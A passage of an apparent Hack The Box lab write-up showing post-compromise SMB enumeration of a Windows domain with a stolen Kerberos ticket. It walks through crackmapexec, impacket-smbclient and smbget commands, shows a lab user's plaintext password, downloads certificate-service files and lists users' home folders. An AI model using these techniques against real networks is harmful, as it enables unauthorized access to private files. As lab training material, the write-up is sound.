hope.sharp Session
Checking for SMB access level of the hope.sharp user
┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ KRB5CCNAME=hope.sharp@research.search.htb.ccache crackmapexec smb research.search.htb -k --use-kcache --kdcHost research.search.htb --shares
smb research.search.htb 445 research [*] windows 10.0 build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB research.search.htb 445 RESEARCH [+] search.htb\ from ccache
SMB research.search.htb 445 RESEARCH [+] Enumerated shares
SMB research.search.htb 445 RESEARCH Share Permissions Remark
SMB research.search.htb 445 RESEARCH ----- ----------- ------
SMB research.search.htb 445 RESEARCH ADMIN$ Remote Admin
SMB research.search.htb 445 RESEARCH C$ Default share
SMB research.search.htb 445 RESEARCH CertEnroll READ Active Directory Certificate Services share
SMB research.search.htb 445 RESEARCH helpdesk
SMB research.search.htb 445 RESEARCH IPC$ READ Remote IPC
SMB research.search.htb 445 RESEARCH NETLOGON READ Logon server share
SMB research.search.htb 445 RESEARCH RedirectedFolders$ READ,WRITE
SMB research.search.htb 445 RESEARCH SYSVOL READ Logon server share Using thepass_the_ticket technique with the TGT of the hope.sharp user, I can finally access the SMB server
While there are several interesting shares available, the user has access to 2 none default shares;
//research.search.htb/certenroll: read//research.search.htb/redirectedfolders$: read, write
┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ KRB5CCNAME=hope.sharp@research.search.htb.ccache impacket-smbclient SEARCH.HTB/@research.search.htb -k -no-pass -dc-ip $IP
Impacket v0.12.0.dev1+20231130.165011.d370e63 - Copyright 2023 Fortra
Type help for list of commands
# Connected
//research.search.htb/CertEnroll Share
# use CertEnroll
# ls
drw-rw-rw- 0 Tue Jan 30 10:08:11 2024 .
drw-rw-rw- 0 Tue Jan 30 10:08:11 2024 ..
-rw-rw-rw- 330 Tue Apr 7 09:29:31 2020 nsrev_search-RESEARCH-CA.asp
-rw-rw-rw- 883 Tue Apr 7 09:29:29 2020 Research.search.htb_search-RESEARCH-CA.crt
-rw-rw-rw- 735 Tue Jan 30 10:08:11 2024 search-RESEARCH-CA+.crl
-rw-rw-rw- 931 Tue Jan 30 10:08:09 2024 search-RESEARCH-CA.crlPresence of the //research.search.htb/CertEnroll share is indeed expected, given the discovery of relevant web endpoints earlier
┌──(kali㉿kali)-[~/…/labs/search/smb/CertEnroll]
└─$ smbget -e --recursive smb://research.search.htb/CertEnroll/ -U 'SEARCH.HTB/hope.sharp%IsolationIsKey?'
Using domain: SEARCH.HTB, user: hope.sharp
smb://research.search.htb/CertEnroll//nsrev_search-RESEARCH-CA.asp
smb://research.search.htb/CertEnroll//Research.search.htb_search-RESEARCH-CA.crt
smb://research.search.htb/CertEnroll//search-RESEARCH-CA+.crl
smb://research.search.htb/CertEnroll//search-RESEARCH-CA.crl
Downloaded 2.81kB in 2 secondsDownloading them to Kali for further analysis
//research.search.htb/RedirectedFolders$ Share
# use RedirectedFolders$
# ls
drw-rw-rw- 0 tue jan 30 15:09:29 2024 .
drw-rw-rw- 0 tue jan 30 15:09:29 2024 ..
drw-rw-rw- 0 tue apr 7 20:12:58 2020 abril.suarez
drw-rw-rw- 0 fri jul 31 15:11:32 2020 Angie.Duffy
drw-rw-rw- 0 fri jul 31 14:35:32 2020 Antony.Russo
drw-rw-rw- 0 tue apr 7 20:32:31 2020 belen.compton
drw-rw-rw- 0 fri jul 31 14:37:36 2020 Cameron.Melendez
drw-rw-rw- 0 tue apr 7 20:15:09 2020 chanel.bell
drw-rw-rw- 0 fri jul 31 15:09:07 2020 Claudia.Pugh
drw-rw-rw- 0 fri jul 31 14:02:04 2020 Cortez.Hickman
drw-rw-rw- 0 tue apr 7 20:20:08 2020 dax.santiago
drw-rw-rw- 0 fri jul 31 13:55:34 2020 Eddie.Stevens
drw-rw-rw- 0 thu apr 9 22:04:11 2020 edgar.jacobs
drw-rw-rw- 0 fri jul 31 14:39:50 2020 Edith.Walls
drw-rw-rw- 0 tue apr 7 20:23:13 2020 eve.galvan
drw-rw-rw- 0 tue apr 7 20:29:22 2020 frederick.cuevas
drw-rw-rw- 0 thu apr 9 16:34:41 2020 hope.sharp
drw-rw-rw- 0 tue apr 7 20:07:00 2020 jayla.roberts
drw-rw-rw- 0 fri jul 31 15:01:06 2020 Jordan.Gregory
drw-rw-rw- 0 thu apr 9 22:11:39 2020 payton.harmon
drw-rw-rw- 0 fri jul 31 13:44:32 2020 Reginald.Morton
drw-rw-rw- 0 tue apr 7 20:10:25 2020 santino.benjamin
drw-rw-rw- 0 fri jul 31 14:21:42 2020 Savanah.Velazquez
drw-rw-rw- 0 thu nov 18 02:01:45 2021 sierra.frye
drw-rw-rw- 0 thu apr 9 22:14:26 2020 trace.ryanthe //research.search.htb/redirectedfolders$ share appears to be mapped to the c:\Users directory, listing all the home directories of users
# tree .
/abril.suarez/Desktop
/abril.suarez/Documents
/abril.suarez/Downloads
/Angie.Duffy/Desktop
/Angie.Duffy/Documents
/Angie.Duffy/Downloads
/Antony.Russo/Desktop
/Antony.Russo/Documents
/Antony.Russo/Downloads
/belen.compton/Desktop
/belen.compton/Documents
/belen.compton/Downloads
/Cameron.Melendez/Desktop
/Cameron.Melendez/Documents
/Cameron.Melendez/Downloads
/chanel.bell/Desktop
/chanel.bell/Documents
/chanel.bell/Downloads
/Claudia.Pugh/Desktop
/Claudia.Pugh/Documents
/Claudia.Pugh/Downloads
/Cortez.Hickman/Desktop
/Cortez.Hickman/Documents
/Cortez.Hickman/Downloads
/dax.santiago/Desktop
/dax.santiago/Documents
/dax.santiago/Downloads
/Eddie.Stevens/Desktop
/Eddie.Stevens/Documents
/Eddie.Stevens/Downloads
/edgar.jacobs/Desktop
/edgar.jacobs/Documents
/edgar.jacobs/Downloads
/Edith.Walls/Desktop
/Edith.Walls/Documents
/Edith.Walls/Downloads
/eve.galvan/Desktop
/eve.galvan/Documents
/eve.galvan/Downloads
/frederick.cuevas/Desktop
/frederick.cuevas/Documents
/frederick.cuevas/Downloads
/hope.sharp/Desktop
/hope.sharp/Documents
/hope.sharp/Downloads
/jayla.roberts/Desktop
/jayla.roberts/Documents
/jayla.roberts/Downloads
/Jordan.Gregory/Desktop
/Jordan.Gregory/Documents
/Jordan.Gregory/Downloads
/payton.harmon/Desktop
/payton.harmon/Documents
/payton.harmon/Downloads
/Reginald.Morton/Desktop
/Reginald.Morton/Documents
/Reginald.Morton/Downloads
/santino.benjamin/Desktop
/santino.benjamin/Documents
/santino.benjamin/Downloads
/Savanah.Velazquez/Desktop
/Savanah.Velazquez/Documents
/Savanah.Velazquez/Downloads
/sierra.frye/Desktop
/sierra.frye/Documents
/sierra.frye/Downloads
/sierra.frye/user.txt
/trace.ryan/Desktop
/trace.ryan/Documents
/trace.ryan/Downloads
/hope.sharp/Desktop/$RECYCLE.BIN/desktop.ini
/hope.sharp/Documents/$RECYCLE.BIN/desktop.ini
/hope.sharp/Downloads/$RECYCLE.BIN/desktop.ini
/hope.sharp/Desktop/$RECYCLE.BIN
/hope.sharp/Desktop/desktop.ini
/hope.sharp/Desktop/Microsoft Edge.lnk
/hope.sharp/Documents/$RECYCLE.BIN
/hope.sharp/Documents/desktop.ini
/hope.sharp/Downloads/$RECYCLE.BIN
/hope.sharp/Downloads/desktop.ini
/sierra.frye/Desktop/$RECYCLE.BIN
/sierra.frye/Desktop/desktop.ini
/sierra.frye/Desktop/Microsoft Edge.lnk
/sierra.frye/Desktop/user.txt
/sierra.frye/Desktop/$RECYCLE.BIN/desktop.ini
Finished - 108 files and foldersIt would appear that the current user is able to access the %USERPROFILE%/Desktop directory of the sierra.frye user as well
# cd sierra.frye
# cat user.txt
[-] smb sessionerror: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)However, the hope.sharp user is unable to read the user.txt in the home directory of the sierra.frye user
It’s likely that the file itself is exclusively configured to be only readable by the owner